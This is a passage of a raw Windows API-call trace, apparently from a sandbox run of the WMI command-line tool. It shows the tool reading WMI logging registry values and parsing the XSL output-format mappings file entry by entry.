[0036.706] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x12f6b8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x12f6b8*=0x42) returned 0x0
[0036.706] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x18ed10, lpcbData=0x12f6b8*=0x42 | out: lpType=0x0, lpData=0x18ed10*=0x25, lpcbData=0x12f6b8*=0x42) returned 0x0
[0036.706] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0036.706] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
[0036.706] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x12f6bc, lpcbData=0x12f6b8*=0x400 | out: lpType=0x0, lpData=0x12f6bc*=0x36, lpcbData=0x12f6b8*=0xc) returned 0x0
[0036.706] _wtol (_String="65536") returned 65536
[0036.706] RegCloseKey (hKey=0x0) returned 0x6
[0036.706] CoCreateInstance (in: rclsid=0x896d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x896d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x12fb4c | out: ppv=0x12fb4c*=0x5e4630) returned 0x0
[0037.753] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x5e4630, xmlSource=0x12fad0*(varType=0x8, wReserved1=0xffff, wReserved2=0x6570, wReserved3=0x76f7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x12fb34 | out: isSuccessful=0x12fb34*=0xffff) returned 0x0
[0042.379] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x5e4630, DOMElement=0x12fb48 | out: DOMElement=0x12fb48*=0x5e8c58) returned 0x0
[0042.380] IXMLDOMElement:getElementsByTagName (in: This=0x5e8c58, tagName="XSLFORMAT", resultList=0x12fb44 | out: resultList=0x12fb44*=0x5e8e80) returned 0x0
[0042.380] IXMLDOMNodeList:get_length (in: This=0x5e8e80, listLength=0x12fb2c | out: listLength=0x12fb2c*=21) returned 0x0
[0042.380] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=0, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.381] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.381] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.381] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.381] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="TABLE", varVal2=0x0)) returned 0x0
[0042.382] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.382] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.382] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.382] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=1, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.382] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="textvaluelist.xsl") returned 0x0
[0042.382] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.382] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.382] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="VALUE", varVal2=0x0)) returned 0x0
[0042.382] SysStringLen (param_1="VALUE") returned 0x5
[0042.382] SysStringLen (param_1="TABLE") returned 0x5
[0042.382] SysStringLen (param_1="TABLE") returned 0x5
[0042.382] SysStringLen (param_1="VALUE") returned 0x5
[0042.388] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.388] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.388] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.388] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=2, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.388] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="textvaluelist.xsl") returned 0x0
[0042.388] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.388] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.389] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="LIST", varVal2=0x0)) returned 0x0
[0042.389] SysStringLen (param_1="LIST") returned 0x4
[0042.389] SysStringLen (param_1="TABLE") returned 0x5
[0042.389] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.389] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.389] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.389] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=3, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.389] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="rawxml.xsl") returned 0x0
[0042.389] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.389] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.390] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="RAWXML", varVal2=0x0)) returned 0x0
[0042.390] SysStringLen (param_1="RAWXML") returned 0x6
[0042.390] SysStringLen (param_1="TABLE") returned 0x5
[0042.390] SysStringLen (param_1="RAWXML") returned 0x6
[0042.390] SysStringLen (param_1="LIST") returned 0x4
[0042.390] SysStringLen (param_1="LIST") returned 0x4
[0042.390] SysStringLen (param_1="RAWXML") returned 0x6
[0042.390] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.390] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.390] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.390] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=4, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.390] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="htable.xsl") returned 0x0
[0042.390] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.391] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.391] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="HTABLE", varVal2=0x0)) returned 0x0
[0042.391] SysStringLen (param_1="HTABLE") returned 0x6
[0042.391] SysStringLen (param_1="TABLE") returned 0x5
[0042.391] SysStringLen (param_1="HTABLE") returned 0x6
[0042.391] SysStringLen (param_1="LIST") returned 0x4
[0042.391] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.391] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.391] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.391] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=5, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.391] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="hform.xsl") returned 0x0
[0042.391] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.392] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.392] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="HFORM", varVal2=0x0)) returned 0x0
[0042.392] SysStringLen (param_1="HFORM") returned 0x5
[0042.392] SysStringLen (param_1="TABLE") returned 0x5
[0042.392] SysStringLen (param_1="HFORM") returned 0x5
[0042.392] SysStringLen (param_1="LIST") returned 0x4
[0042.392] SysStringLen (param_1="HFORM") returned 0x5
[0042.392] SysStringLen (param_1="HTABLE") returned 0x6
[0042.392] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.392] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.392] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.392] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=6, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.392] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="xml.xsl") returned 0x0
[0042.392] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.393] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.393] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="XML", varVal2=0x0)) returned 0x0
[0042.393] SysStringLen (param_1="XML") returned 0x3
[0042.393] SysStringLen (param_1="TABLE") returned 0x5
[0042.393] SysStringLen (param_1="XML") returned 0x3
[0042.393] SysStringLen (param_1="VALUE") returned 0x5
[0042.393] SysStringLen (param_1="VALUE") returned 0x5
[0042.393] SysStringLen (param_1="XML") returned 0x3
[0042.393] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.393] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.393] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.393] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=7, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.393] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="mof.xsl") returned 0x0
[0042.393] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.394] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.394] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="MOF", varVal2=0x0)) returned 0x0
[0042.402] SysStringLen (param_1="MOF") returned 0x3
[0042.402] SysStringLen (param_1="TABLE") returned 0x5
[0042.402] SysStringLen (param_1="MOF") returned 0x3
[0042.402] SysStringLen (param_1="LIST") returned 0x4
[0042.402] SysStringLen (param_1="MOF") returned 0x3
[0042.402] SysStringLen (param_1="RAWXML") returned 0x6
[0042.402] SysStringLen (param_1="LIST") returned 0x4
[0042.402] SysStringLen (param_1="MOF") returned 0x3
[0042.402] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.402] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.402] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.402] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=8, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.403] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="csv.xsl") returned 0x0
[0042.403] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.403] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.403] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="CSV", varVal2=0x0)) returned 0x0
[0042.403] SysStringLen (param_1="CSV") returned 0x3
[0042.403] SysStringLen (param_1="TABLE") returned 0x5
[0042.403] SysStringLen (param_1="CSV") returned 0x3
[0042.403] SysStringLen (param_1="LIST") returned 0x4
[0042.403] SysStringLen (param_1="CSV") returned 0x3
[0042.403] SysStringLen (param_1="HTABLE") returned 0x6
[0042.403] SysStringLen (param_1="CSV") returned 0x3
[0042.403] SysStringLen (param_1="HFORM") returned 0x5
[0042.404] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.404] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.404] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.404] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=9, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.404] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.404] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.404] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.404] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0
[0042.404] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.404] SysStringLen (param_1="TABLE") returned 0x5
[0042.404] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.404] SysStringLen (param_1="VALUE") returned 0x5
[0042.404] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.404] SysStringLen (param_1="XML") returned 0x3
[0042.404] SysStringLen (param_1="XML") returned 0x3
[0042.404] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.408] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.408] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.408] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.408] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=10, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.409] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.409] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.409] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.409] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="texttablewsys", varVal2=0x0)) returned 0x0
[0042.409] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.409] SysStringLen (param_1="TABLE") returned 0x5
[0042.409] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.409] SysStringLen (param_1="XML") returned 0x3
[0042.409] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.409] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.409] SysStringLen (param_1="XML") returned 0x3
[0042.409] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.410] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.410] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.410] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.410] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=11, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.410] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.410] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.410] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.410] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0
[0042.411] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.411] SysStringLen (param_1="TABLE") returned 0x5
[0042.411] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.411] SysStringLen (param_1="XML") returned 0x3
[0042.411] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.411] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.411] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.411] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.411] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.411] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.411] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.411] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=12, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.411] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.411] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.411] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.411] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0
[0042.412] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.412] SysStringLen (param_1="TABLE") returned 0x5
[0042.412] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.412] SysStringLen (param_1="XML") returned 0x3
[0042.412] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.412] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.412] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.412] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.412] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.412] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0042.412] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.412] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.412] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.412] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=13, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.412] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.412] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.412] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.413] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0
[0042.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.413] SysStringLen (param_1="TABLE") returned 0x5
[0042.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.413] SysStringLen (param_1="XML") returned 0x3
[0042.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.413] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.413] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.413] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.413] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.413] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.413] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.413] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.413] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=14, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.413] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="texttable.xsl") returned 0x0
[0042.414] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.414] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.414] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.414] SysStringLen (param_1="TABLE") returned 0x5
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.414] SysStringLen (param_1="XML") returned 0x3
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.414] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.414] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.414] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0042.414] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0042.414] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0042.415] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.415] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.415] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.415] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=15, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.415] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="htable.xsl") returned 0x0
[0042.415] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.415] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.415] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0
[0042.415] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.415] SysStringLen (param_1="TABLE") returned 0x5
[0042.415] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.415] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.415] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.415] SysStringLen (param_1="XML") returned 0x3
[0042.415] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.415] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.415] SysStringLen (param_1="XML") returned 0x3
[0042.415] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.416] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.416] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.416] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.416] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=16, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.416] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="htable.xsl") returned 0x0
[0042.416] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.416] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.416] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="htable-sortby", varVal2=0x0)) returned 0x0
[0042.416] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.416] SysStringLen (param_1="TABLE") returned 0x5
[0042.416] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.416] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0042.416] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.416] SysStringLen (param_1="XML") returned 0x3
[0042.417] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.417] SysStringLen (param_1="texttablewsys") returned 0xd
[0042.417] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.417] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0042.417] SysStringLen (param_1="XML") returned 0x3
[0042.417] SysStringLen (param_1="htable-sortby") returned 0xd
[0042.417] IUnknown:Release (This=0x5e4b20) returned 0x0
[0042.417] IUnknown:Release (This=0x5e8cf8) returned 0x0
[0042.417] IUnknown:Release (This=0x5e8c98) returned 0x0
[0042.417] IXMLDOMNodeList:get_item (in: This=0x5e8e80, index=17, listItem=0x12fb60 | out: listItem=0x12fb60*=0x5e4b20) returned 0x0
[0042.417] IXMLDOMNode:get_text (in: This=0x5e4b20, text=0x12fb68 | out: text=0x12fb68*="mof.xsl") returned 0x0
[0042.417] IXMLDOMNode:get_attributes (in: This=0x5e4b20, attributeMap=0x12fb5c | out: attributeMap=0x12fb5c*=0x5e8cf8) returned 0x0
[0042.417] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5e8cf8, name="KEYWORD", namedItem=0x12fb58 | out: namedItem=0x12fb58*=0x5e8c98) returned 0x0
[0042.417] IXMLDOMNode:get_nodeValue (in: This=0x5e8c98, value=0x12fb04 | out: value=0x12fb04*(varType=0x8, wReserved1=0x18, wReserved2=0xece0, wReserved3=0x18, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0
[0042.418] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0042.418] SysStringLen (param_1="TABLE") returned 0x5
[0042.418] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
